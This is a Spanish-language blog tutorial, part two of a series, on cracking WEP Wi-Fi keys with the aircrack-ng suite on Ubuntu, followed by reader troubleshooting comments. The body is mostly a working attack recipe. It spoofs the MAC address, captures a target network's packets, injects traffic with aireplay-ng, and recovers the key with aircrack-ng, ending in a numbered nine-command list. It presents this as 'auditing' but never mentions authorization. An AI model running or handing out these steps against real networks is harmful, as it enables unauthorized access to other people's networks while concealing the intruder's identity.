Desifrando Claves WEP con Ubuntu 10.04 II Parte

En el post anterior explique por que el cifrado wep es tan vulnerable y miramos de manera rápida las herramientas que utilizaremos, por si no lo vieron pondré la instalación de las herramientas y el driver para las tarjetas Broadcom BCM43XX.

Iniciamos con la instalación del driver.

sudo apt-get install b43-fwcutter

Ahora instalamos las herramientas necesarias.

sudo apt-get install aircrack-ng macchanger

Teniendo todo lo necesario iniciamos, lo primero que debemos saber es cual es nuestra interfase inalámbrica, abrimos un terminal y tecleamos:

sudo su

Seguido tecleamos nuestra contraseña de root, con esto vamos a poder ejecutar los comandos necesarios sin interponer antes sudo, en la misma consola tecleamos:

airmon-ng

Esto nos va a devolver la interfase inalambrica con la que contemos, la salida deberá de ser como se muestra en la imagen:

Este comando nos muestra nuestra interfase inalambrica

Ahora paramos la interfase con el siguiente comando:

airmon-ng stop wlan0

Obtenemos la siguiente salida:

Ahora damos de baja la interfase wlan0 con ifconfig y cambiamos la dirección MAC de nuestra tarjeta

ifconfig wlan0 down

macchanger –mac 00:11:22:33:44:55 wlan0

Iniciamos de nuevo la interface wlan0, pero ahora con mon0 habilitado que es la interfase que nos permite capturar paquetes de la red a auditar

airmon-ng start wlan0

Obtenemos la siguiente salida:

Para ver las redes que están a nuestro alcance tecleamos el comando:

airodump-ng mon0

Obtenemos la siguiente salida:

Como podemos ver en la imagen aparecen las redes que estén a nuestro alcance en mi caso solo dispongo de una, los datos que vamos a tomar encuenta para iniciar la captura son:

Canal (CH)
BSSID

En la terminal que tenemos abierta presionamos Ctrl + C y tecleamos el siguiente comando:

airodump-ng -c 1 -w prueba –bssid 00:24:17:BB:AF:01 mon0

c (CH): Es el canal por el cual se capta la señal de la red
w: Nombre del archivo que se creara para guardar los paquetes capturados
bssid: Identificador del router que se esta auditando
mon0: Interface utilizada para capturar paquetes de red

Obtenemos la siguiente salida que es igual a la anterior la diferencia es que este comando guarda los paquetes capturados:

Con este comando ya estamos captando paquetes de una red en especifico, ṕara lograr obtener la clave wep tenemos que capturar 20,000 #Data, para redes con cifrado de 64 bits y 40,000 Data, para redes con cifrado de 128 bits, si la red no cuenta con trafico esto puede tardar varias horas o dias, para solucionar esto tenemos que inyectarle trafico a la red que estamos auditando, para hacerlo abrimos otra terminal sin cerrar la primera y tecleamos:

sudo su

Nos logueamos como root nuevamente y tecleamos lo siguiente:

aireplay-ng -1 0 -a 00:24:17:BB:AF:01 -h 00:11:22:33:44:55 mon0

a: Identificador de red (BSSID)
h: Nuestra direccion MAC falsa

Con este comando debemos de tener la siguiente salida:

Si no obtenemos la salida anterior no podremos inyectar trafico, en la misma consola tecleamos lo siguiente:

aireplay-ng -3 -b 00:24:17:BB:AF:01 -h 00:11:22:33:44:55 mon0

b: Identificador de red (BSSID)
h: Nuestra direccion MAC falsa

Con este comando comenzamos a inyectar trafico en la red, si todo va bien podremos ver como en el campo #Data aumenta muy rápidamente en la primer terminal que abrimos, obtenemos la siguiente salida:

Ahora debemos de tener dos terminales abiertas trabajando como se muestra en la imagen:

Si el campo data ya alcanzo los 20,000 Data abrimos otra terminal y nuevamente tecleamos sudo su y tecleamos lo siguiente:

aircrack-ng nombre_de_archivo.cap

Recordemos que el nombre del archivo nosotros lo elegimos cuando iniciamos a capturar paquetes con la opcion -w de airodump-ng, aircrack inicia a decifrar la clave en base a los paquetes capturados, obteniendo la siguiente imagen:

Cuando muestra la frase KEY FOUND, esa es la clave wep separada por puntos, solamente los eliminamos y el resto es la clave con que nos podremos conectar a la red auditada, abajo pongo los pasos uno a uno en orden a seguir:

1.- airmon-ng stop wlan0
2.- ifconfig wlan0 down
3.- macchanger –mac 00:11:22:33:44:55 wlan0
4.- airmon-ng start wlan0
5.- airodump-ng mon0
6.- airodump-ng -c 1 -w prueba –bssid 00:24:17:BB:AF:01 mon0
7.- aireplay-ng -1 0 -a 00:24:17:BB:AF:01 -h 00:11:22:33:44:55 mon0
8.- aireplay-ng -3 -b 00:24:17:BB:AF:01 -h 00:11:22:33:44:55 mon0
9.- aircrack-ng nombre_de_archivo.cap

Al final del procedimiento terminamos con tres terminales abiertas

6 comentarios el “Desifrando Claves WEP con Ubuntu 10.04 II Parte

  1. Pingback: Articulo Indexado en la Blogosfera de Sysmaya

  2. buenas tengo un problema con esta parte “airodump-ng -c 1 -w prueba –bssid 00:24:17:BB:AF:01 mon0″ yo lo edito pes con los datos de la red q se va a capturar! pero cuando le doy enter… me sale ” “airodump-ng –help” for help.”

    • ya lo solucione! era q tenia q poner “–bssid” con los 2 guiones juntos! habia puesto el q tu tienes en el tuto q la verdad no se porq se ve como un guion largo completo! pero eso era todo! 😉 la me sale como lo tienes en la imagen de esa parte seguire con elr esto jeje! saludos!

    • si pudieras proporcionarme mas informacion por ejemplo todos los mensajes que obtienes desde poner en modo monitor tu tarjeta hasta llegar a este paso, o puede ser que la interface de tu tarjeta no es mon0, espero mas informacion gracias

  3. cuando pongo aireplay-ng -1 0 -a 00:1C:10:3A:BD:E9 -h 00:1D:D9:78:C1:91 mon0
    me sale eso =
    18:51:42 Waiting for beacon frame (BSSID: 00:1C:10:3A:BD:E9) on channel -1
    18:51:42 mon0 is on channel -1, but the AP uses channel 6

    lo realizo en fedora 15
    alguien me puede ayudar

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s